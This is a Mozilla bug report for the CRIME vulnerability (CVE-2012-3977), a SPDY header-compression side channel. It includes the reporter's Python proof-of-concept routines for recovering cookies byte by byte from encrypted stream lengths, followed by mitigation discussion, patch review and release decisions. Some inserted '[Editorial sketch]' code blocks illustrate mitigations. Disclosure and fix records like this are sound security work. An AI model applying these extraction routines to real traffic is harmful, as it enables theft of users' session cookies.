Closed Bug 779413 (CVE-2012-3977) Opened 13 years ago Closed 13 years ago

SPDY compression infoleak (CRIME)

Categories

(Core :: Networking: HTTP, defect)

Hardware: x86
OS: All
Type: defect
Priority: Not set
Severity: normal

Tracking


RESOLVED FIXED
mozilla17
Tracking Status
firefox14 - wontfix
firefox15 + fixed
firefox16 + verified
firefox17 + fixed
firefox-esr10 --- unaffected

People

(Reporter: thaidn, Assigned: mcmanus)

References

Details

(Keywords: reporter-external, sec-high, Whiteboard: [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012][qa-])

Attachments

(1 file)

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11

Steps to reproduce:

1. Introduction

It is a known vulnerability that combining compression with encryption can sometimes reveal information that would not have been revealed without compression [1]. We have developed working exploits for this vulnerability in Firefox's implementation of SPDY compression. There are two attacks; both can reliably extract cookies from SPDY over SSL/TLS just by:

* using JavaScript to create new <img> tags pointed at the target domain
* looking at the lengths of the resulting encrypted SPDY streams

It's worth noting that our attacks don't require any plugins; we use JavaScript to make them faster, but it's possible to implement them even without any scripting capabilities.

Actual results:

2. First attack: Two Tries

In SPDY the entire contents of the name/value header block, including the URL and cookies, are compressed using zlib deflate. Suppose that the cookie name is SID and we want to obtain the first byte of its value, which we suppose is the byte A. The first attack, which we call Two Tries, works as follows. For each byte (guesschar) in the cookie's character set, it constructs two URLs using this function:

GUESS_LEN = 4
WINDOW_LEN = 2**15 - 262  # zlib's default window size, see http://www.zlib.net/zlib_tech.html
PAD_BYTE = '&'
REQ = " HTTP/1.1\r\nHost: localhost:8443\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.15 Safari/537.1\r\nAccept: */*\r\nReferer: https://localhost:8443/a.html\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\nCookie: "

def two_guess(known, guesschar):
    guess = known[-(GUESS_LEN-1):] + guesschar  # ID=x
    boundary = PAD_BYTE * GUESS_LEN
    url1 = guess + boundary
    url2 = boundary + guess
    total_pad = WINDOW_LEN - len(REQ) - len(known) - 5 - 1  # 5 for "GET /", and 1 for the guesschar
    padding = PAD_BYTE * total_pad
    url1 += padding
    url2 += padding
    return (url1, url2)

where known is "SID=". The trick here is to make sure that guess falls outside zlib's window in url1, but not in url2. These two URLs are then used to open new cookie-bearing requests to the target (e.g., by setting them as image sources). Here is our oracle:

* When guess isn't equal to ID=A, the lengths of both SYN streams are the same.
* When guess is equal to ID=A, the lengths of both SYN streams differ. This happens because the string "ID=A" in the cookie is replaced by a back-reference to the same string in url2.

We found that this oracle is reliable enough to extract cookies.

3. Second attack

While Two Tries is a generic attack, we have also developed a SPDY-specific attack. We found that SPDY uses a single zlib stream (context) for all name/value pairs in one direction on a SPDY connection. This is understandably done to get the most out of compression, i.e., it makes subsequent header blocks compress to very small outputs -- so small that zlib decides to use fixed Huffman codes (see section 3.2.6 of the DEFLATE spec, RFC 1951), which assign long code lengths to literals. This allows us to conduct an easier attack as follows:

import random
import string

BASE64 = string.ascii_letters + string.digits + '+/'  # assumed cookie alphabet

# query(url), defined elsewhere, issues a cookie-bearing request for url
# and returns the observed length of the resulting encrypted SPDY stream

def random_str(length):
    chars = BASE64
    return ''.join(random.choice(chars) for i in xrange(length))

def next_byte(known, alphabet=BASE64):
    # the first request is to "reset" the compression state so that
    # subsequent requests would compress to fixed Huffman codes
    reset = known[-5:] + '?'
    url = "/?%s%s" % (random_str(2), reset)
    query(url)
    # the second request is used to determine the length of requests with an
    # incorrect guess; '.' can be replaced with any char not in the cookie's
    # character set
    incorrect = known[-5:] + '.'
    url = "/?%s%s" % (random_str(2), incorrect)
    length = query(url)
    good = list(alphabet)
    while len(good) != 1:
        for c in list(good):  # iterate over a copy so we can remove from good
            guess = known[-5:] + c
            url = '/?%s%s' % (random_str(2), guess)
            i = query(url)
            # if guess matches a substring of the cookie, the length of the
            # resulting request is smaller than those that don't match
            if i >= length:
                good.remove(c)
    return good[0]

This attack is 100% reliable, for both SPDY/2 and SPDY/3. Note that the attacks described so far are not necessarily the best ones (in terms of the number of requests per byte, for example). We include them here because they are simple, hence easier to explain and understand. We have slightly more complicated algorithms that get it down to a few requests per byte.
See http://code.google.com/p/chromium/issues/detail?id=139744 for a discussion of possible solutions.
OS: Mac OS X → All
Component: Untriaged → Networking: HTTP
Product: Firefox → Core
Summary: SPYD compression infoleak → SPDY compression infoleak
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-high
CC'ing Chris Evans from the Chrome security team. Since we can't see the Chromium discussion, perhaps he can add the relevant bits to this bug.
Status: NEW → UNCONFIRMED
Ever confirmed: false
Keywords: sec-high
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-high
We're working on a workaround on the client side at the moment. We'll let you know as soon as we have something.
(In reply to Brian Smith (:bsmith) from comment #4)
> Similar issues were discussed last year on spdy-dev:
> https://groups.google.com/d/msg/spdy-dev/B_ulCnBjSug/rcU-SIFtTKoJ

Yes. Once again, had I the time to follow up on all my ideas, the world would be a better place :)
For SPDY/4, we're redoing the compression anyway and can fix this in the design. For SPDY/2 and SPDY/3 we want a workaround. I have a change out for review that implements the following rules for SPDY/2 and 3.

We classify header values into three types: whitelisted, "cookies", and non-whitelisted.

* Whitelisted header values (and all other data) compress normally, except that they never back-reference "cookies" or non-whitelisted header values.
* Non-whitelisted header values are compressed in a unique Huffman context for each value and never back-reference other data in the window.
* "cookies" is split into a series of cookie values. Each cookie value is terminated with a semicolon, with no whitespace in between. Cookie values are compressed in unique Huffman contexts and may only be back-referenced in their entirety, and the match must be preceded by either a semicolon or standard data. This means that a cookie value either back-references the exact same value from the window, or is encoded in full.

This involves patching zlib and does impact the compression rates. However, analysis shows that our window is currently too small, so our compression is actually pretty bad already; therefore this change doesn't cost much on top of that. If we simulate increasing the window, then we do see an impact. Some cookies are longer than MAX_MATCH and so never match, and some of those cookies have internal redundancy that we're also excluding.

Currently the whitelist looks like:

} else if (it->first == "accept" ||
           it->first == "accept-charset" ||
           it->first == "accept-encoding" ||
           it->first == "accept-language" ||
           it->first == "host" ||
           it->first == "version" ||
           it->first == "method" ||
           it->first == "scheme" ||
           it->first == ":host" ||
           it->first == ":version" ||
           it->first == ":method" ||
           it->first == ":scheme" ||
           it->first == "user-agent") {
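[Editorial sketch] A rough Python model of the isolation property described above. It is not the actual Chromium patch (which modifies zlib's match finder directly): whitelisted values share one deflate context, while every other value gets a throwaway context of its own, so secret bytes can never be back-referenced by attacker-influenced data. The concatenated output only models lengths; it is not a valid single zlib stream.

import zlib

# header names whose values are considered safe for the shared context
WHITELIST = {"accept", "accept-charset", "accept-encoding", "accept-language",
             "host", "version", "method", "scheme",
             ":host", ":version", ":method", ":scheme", "user-agent"}

def compress_headers(headers):
    shared = zlib.compressobj(9)  # shared context: names + whitelisted values
    out = b""
    for name, value in headers:
        out += shared.compress(name.encode() + b": ")
        if name.lower() in WHITELIST:
            out += shared.compress(value.encode())
        else:
            # throwaway per-value context: no back-references ever cross
            # this boundary in either direction
            out += zlib.compress(value.encode(), 9)
        out += shared.compress(b"\r\n")
    return out + shared.flush()

hdrs = [("method", "GET"), ("cookie", "SID=secretsecret"), ("accept", "*/*")]
print(len(compress_headers(hdrs)))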
Gecko doesn't enable TLS-level compression, so only the SPDY header compression is relevant to us at the current time.

Options:

1. The simplest, lowest-risk workaround is to turn SPDY off until we implement a version of SPDY that is designed to counteract this. AFAICT, this is something we can do with the Hotfix addon for Firefox 14, and something we can do with a code change for a Firefox 14.x chemspill.

2. AFAICT, the next simplest, next-lowest-risk workaround is to configure zlib in "store only" mode (Z_NO_COMPRESSION). That way, we output the zlib stream that the SPDY spec requires, but we don't actually do any compression, so we avoid leaking cookies through the length side channel via back-references and Huffman coding. This should almost certainly result in better performance than #1, and it is (I think) a one-line change, so it would also be acceptable for a Firefox 14 chemspill and/or Firefox 15 betas. (See the sketch after this comment.)

3. (A variant of) the workaround that Adam proposes in comment 6, or similar.

4. It doesn't seem totally crazy to say that we would probably be mostly safe from attacks if we did compression as normal for same-origin requests, but turned off compression (option #2) for cross-origin requests. Then (as far as I can tell off the top of my head), the attack would only work if the attacker's script XSS'd the victim domain. Still, this doesn't seem better than doing #3 and it might even be more work.

I suggest we do #2 now and then attempt option #3 if/when we have time to do so, possibly only doing #3 on -aurora and -central.

Patrick, do you think it is worthwhile to attempt a workaround like Adam's to keep some level of compression, given current SPDY adoption rates and given the (in)effectiveness of the header compression in general?

(In reply to Adam Langley from comment #6)
> Whitelisted header values (and all other data) compress normally, except
> that they never back-reference "cookies" or non-whitelisted header values.

Is this just a side-effect of the changes mentioned below?
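[Editorial sketch] What option #2 looks like through Python's zlib bindings (illustrative only; Gecko calls deflateInit directly). Level 0 still produces a correctly framed zlib stream, but the payload travels in stored blocks, so output length tracks input length and the content leaks nothing through compression:

import zlib

data = b"Cookie: SID=supersecretvalue\r\n"
c = zlib.compressobj(0)  # 0 == Z_NO_COMPRESSION: "store only"
out = c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
assert data in out            # bytes pass through verbatim in a stored block
print(len(data), len(out))    # lengths differ only by fixed framing overhead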
(In reply to Brian Smith (:bsmith) from comment #7)
> I suggest we do #2 now and then attempt option #3 if/when we have time to do
> so, possibly only doing #3 on -aurora and -central.

That seems reasonable.

> > Whitelisted header values (and all other data) compress normally, except
> > that they never back-reference "cookies" or non-whitelisted header values.
>
> Is this just a side-effect of the changes mentioned below?

In order to achieve this, zlib is patched to keep a bit for each byte in the window. Bytes from cookie values and non-whitelisted header values set their corresponding bit. When compressing normal data, zlib checks that no back-reference includes tagged bytes from the window.
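[Editorial sketch] A toy model of that tagging scheme, written for this bug: real zlib tracks the bits inside its match finder, and this naive greedy matcher ignores Huffman coding and lazy matching entirely. Each input byte carries a secret flag, and any candidate match that overlaps a secret byte is rejected:

def lz77_with_tags(data, tags, min_match=3, window=32768):
    # greedy LZ77 over data; tags[i] is True when byte i is secret
    out, i = [], 0
    while i < len(data):
        best_len, best_dist = 0, 0
        for j in range(max(0, i - window), i):
            l = 0
            while i + l < len(data) and data[j + l] == data[i + l]:
                l += 1
            # reject matches that would back-reference any tagged byte
            if l >= min_match and l > best_len and not any(tags[j:j + l]):
                best_len, best_dist = l, i - j
        if best_len:
            out.append(("match", best_dist, best_len))
            i += best_len
        else:
            out.append(("lit", chr(data[i])))
            i += 1
    return out

cookie = b"Cookie: SID=secret; "
data = cookie + b"GET /?SID=secret"
untagged = [False] * len(data)
tagged = [True] * len(cookie) + [False] * (len(data) - len(cookie))
print(lz77_with_tags(data, untagged))  # the probe back-references the cookie
print(lz77_with_tags(data, tagged))    # cookie bytes are never referenced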
(In reply to Brian Smith (:bsmith) from comment #7)
> I suggest we do #2 now and then attempt option #3 if/when we have time to do
> so, possibly only doing #3 on -aurora and -central.

I tentatively agree, but I'm going to give the matter some more thought on the flight home. Assuming nothing new comes to mind, I'll make the effectively-no-compression change no later than Monday, and we can get that either into a chemspill or 15 according to what release drivers want.

> Patrick, do you think it is worthwhile to attempt a workaround like Adam's
> to keep some level of compression, given current SPDY adoption rates and
> given the (in)effectiveness of the header compression in general?

Yes, we want to do something here. We actually get very good compression rates (>75% of requests are reduced 95% or more) that interact positively with cwnd to really help the mux rate, but we use full 32KB windows to do the work. So it's an important feature (though not the most important feature - that's mux - so a compressionless but muxed SPDY is still worth having).

After getting the chemspill out we might want a custom zlib, or we might want to fast-track a SPDY/4 with a table-driven compression scheme that would be resilient here. More thought needed.

Too early to comment on backporting potential. I'll query Will and Roberto too.
(In reply to Adam Langley from comment #6)
> } else if (it->first == "accept" ||
>            it->first == "host" ||
>            it->first == "method" ||
>            it->first == ":host" ||
>            it->first == ":method" ||
>            it->first == ":scheme" ||

Accept, host, and method can be controlled by the attacker with XHR, and "host" can be controlled by the attacker even without XHR. (Consider the case where the server is using a wildcard certificate and all subdomains resolve to the same IP, so that we coalesce the connections into one.)

Or is the criterion for inclusion in this list "the attacker already knows the value" rather than "the attacker can't control the value"?

(In reply to Patrick McManus [:mcmanus] from comment #10)
> After getting the chemspill out we might want a custom zlib, or we might
> want to fast-track a SPDY/4 with a table-driven compression scheme that
> would be resilient here.

I looked in the mailing list archives and I couldn't figure out where a new header compression scheme is being worked on. Do you have a link?
(In reply to Brian Smith (:bsmith) from comment #11)
> Or is the criterion for inclusion in this list "the attacker already knows
> the value" rather than "the attacker can't control the value"?

The former makes sense to me. As long as they can control something (the URI), the attack works to find unknown items, right?

> I looked in the mailing list archives and I couldn't figure out where a new
> header compression scheme is being worked on. Do you have a link?

https://groups.google.com/forum/#!topic/spdy-dev/n-GEGoou4CE

It's just a preliminary proposal that would, as written, still have this exposure, but the basic property of having values be atomic and table-driven probably provides a solution path as I understand it.
Whiteboard: [spdy]
Attached patch patch 0 — Splinter Review
This patch disables upstream compression. It's a triage measure while we figure out whether the next step is a custom zlib like agl describes, a protocol change, or some other bit of hackery not yet thought up. @try confirmed interop with twitter/google.com/gmail/nginx/jetty.
Attachment #649531 - Flags: review?(bsmith)
Comment on attachment 649531 [details] [diff] [review]
patch 0

Review of attachment 649531 [details] [diff] [review]:
-----------------------------------------------------------------

::: netwerk/protocol/http/SpdySession2.cpp
@@ +553,5 @@
>   mUpstreamZlib.opaque = Z_NULL;
>
> + // mixing carte blanche compression with tls subjects us to traffic
> + // analysis attacks
> + deflateInit(&mUpstreamZlib, Z_NO_COMPRESSION);

Why are we not checking the return values of these zlib functions? I expect that when we get close to an OOM condition, this will return an error code, and I'm not sure what zlib will do if we pass a partially-initialized context to it. (See also inflateInit, deflateSetDictionary, etc.) We should NS_RUNTIMEABORT if these functions fail due to OOM, and return NS_ERROR_UNEXPECTED if they return another error code. (We could perhaps have an NS_ENSURE_ZLIB_SUCCESS(x) macro that helps with these checks.)

@@ +558,1 @@
>   deflateSetDictionary(&mUpstreamZlib,

It's not necessary to set the dictionary when no compression is happening. We should comment this call out.

::: netwerk/protocol/http/SpdySession3.cpp
@@ +559,1 @@
>   deflateSetDictionary(&mUpstreamZlib,

Ditto.
Attachment #649531 - Flags: review?(bsmith) → review+
(In reply to Brian Smith (:bsmith) from comment #14)
> Comment on attachment 649531 [details] [diff] [review]
> patch 0

I'm not planning to make either of the changes you suggest, mostly because I only want to port the minimum necessary changes to the various branches that accomplish the patch's objectives while minimizing regression risk. But I'm happy to talk about them :)

> Why are we not checking the return values of these zlib functions? I expect
> that when we get close to an OOM condition, this will return an error code,
> and I'm not sure what zlib will do if we pass a partially-initialized
> context to it. (See also inflateInit, deflateSetDictionary, etc.)

We can check in another patch, but zlib already uses infallible malloc (see the explicit allocator references), so the specific OOM concerns are not germane.

> It's not necessary to set the dictionary when no compression is happening.
> We should comment this call out.

I think that would generate an invalid SPDY stream. It would create an RFC 1950 stream with the FDICT flag set to 0 and no dictionary checksum, rather than one carrying the checksum defined by the protocol. Even though the dictionary is unused when generating the compression stream with no compression, a receiver would be right in thinking the header was invalid. (We admittedly aren't so picky - maybe we should be :))
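[Editorial sketch] A quick illustration of that RFC 1950 point through Python's zlib bindings, not the Gecko code: even at level 0, a preset dictionary changes the stream header, setting the FDICT bit and embedding the dictionary's Adler-32 (DICTID), so a strict receiver can detect a missing or wrong dictionary. DICT is a stand-in, not the real SPDY dictionary:

import zlib

DICT = b"optionsgetheadpostputdeletetraceaccept"  # stand-in dictionary

plain = zlib.compressobj(0)
keyed = zlib.compressobj(0, zlib.DEFLATED, 15, 8, zlib.Z_DEFAULT_STRATEGY, DICT)

h1 = plain.compress(b"x") + plain.flush()
h2 = keyed.compress(b"x") + keyed.flush()

# FLG byte: the FDICT bit (0x20) is set only in the dictionary stream
print(h1[1] & 0x20, h2[1] & 0x20)
# the four bytes after the header are the dictionary's Adler-32 (DICTID)
assert int.from_bytes(h2[2:6], "big") == zlib.adler32(DICT)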
Comment on attachment 649531 [details] [diff] [review]
patch 0

The risk of a serious problem here is pretty low because the change is tightly confined and interop has been confirmed with the big SPDY server deployments. I think porting to aurora-16 and beta-15 is a good idea.

I personally don't think a port to -14 w/chemspill is necessary because:
* 15 is coming soon
* there hasn't been an in-the-wild version of this attack cited (or implied, AFAIK)
* the attack still requires sniffing access to the generated TLS stream, so it can't spread without some physical proximity (i.e. it can't be wholly performed in JS)

Brian mentioned the possibility of a chemspill in comment 7, so I'm setting the a? flag so a decision can be made.
Attachment #649531 - Flags: approval-mozilla-release?
Attachment #649531 - Flags: approval-mozilla-beta?
Attachment #649531 - Flags: approval-mozilla-aurora?
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla17
Comment on attachment 649531 [details] [diff] [review]
patch 0

Approving for Beta/Aurora, and I am looking into whether we want to chemspill or hotfix for 14.
Attachment #649531 - Flags: approval-mozilla-beta?
Attachment #649531 - Flags: approval-mozilla-beta+
Attachment #649531 - Flags: approval-mozilla-aurora?
Attachment #649531 - Flags: approval-mozilla-aurora+
Adam, is the zlib code something you can share at this point?
One last note on the chemspill decision: to do this attack without actively rewriting packets, you need to both passively observe the traffic (which generally requires physical proximity) and bait someone into running the exploit page at the same time. So there is a decent bar to surpass there.
Comment on attachment 649531 [details] [diff] [review]
patch 0

Confirmed with dveditz that we do not need to chemspill for this: it's privately reported, not in the wild, and there's no imminent danger that we can't wait the two weeks until 15 goes out.
Attachment #649531 - Flags: approval-mozilla-release? → approval-mozilla-release-
Whiteboard: [spdy] → [spdy][advisory-tracking+]
Alias: CVE-2012-3977
Patrick, is there another bug for re-enabling compression? I agree that we don't need to chemspill 14 for this.
(In reply to Brian Smith (:bsmith) from comment #24)
> Patrick, is there another bug for re-enabling compression?

Right now it's just on my private todo list, only because I haven't figured out what the security setting on the bug would be. Feel free to file and assign to me if I don't get to it first.
(sorry for the silence, was on vacation.) Chrome's zlib changes have landed in http://src.chromium.org/viewvc/chrome?view=rev&revision=151720. That doesn't appear to have broken the canary build over the past few days so I'll request a merge to the M22 branch. Chrome 22 should be stable in 4-5 weeks.
Blocks: 785279
Whiteboard: [spdy][advisory-tracking+] → [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012]
Thai: is this bug going to be featured in your Ekoparty CRIME talk? http://www.ekoparty.org/speakers-2012.php#duong
Yes, this vulnerability will be presented at Ekoparty 2012, September 21st, in Buenos Aires, Argentina.
One question: it seems that Firefox 15 has turned header compression off, correct?
(In reply to Thai Duong from comment #29)
> One question: it seems that Firefox 15 has turned header compression off,
> correct?

Correct, Firefox 15 includes attachment 649531 [details] [diff] [review].
Summary: SPDY compression infoleak → SPDY compression infoleak (CRIME)
Thai, can you please help us by verifying this is fixed in Firefox 17.0 Beta and 16.0.1?
Whiteboard: [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012] → [spdy][advisory-tracking+][embargo until Chrome 22 ships in September, 2012][qa-]
What have you done? Last time I checked, it was fixed in FF 15.
We haven't done anything; we just want to make sure Firefox 16.0.1 and 17.0 Beta are also fixed. Can you help us out by testing those builds?
I've verified that the header isn't compressed in Firefox 16.0.1. I don't have the 17.0 Beta, but if you haven't changed anything then you'll be fine.
Thanks Thai, marking this verified fixed for Firefox 16 based on your testing.
Group: core-security
rforbes-bugspam-for-setting-that-bounty-flag-20130719
Flags: sec-bounty+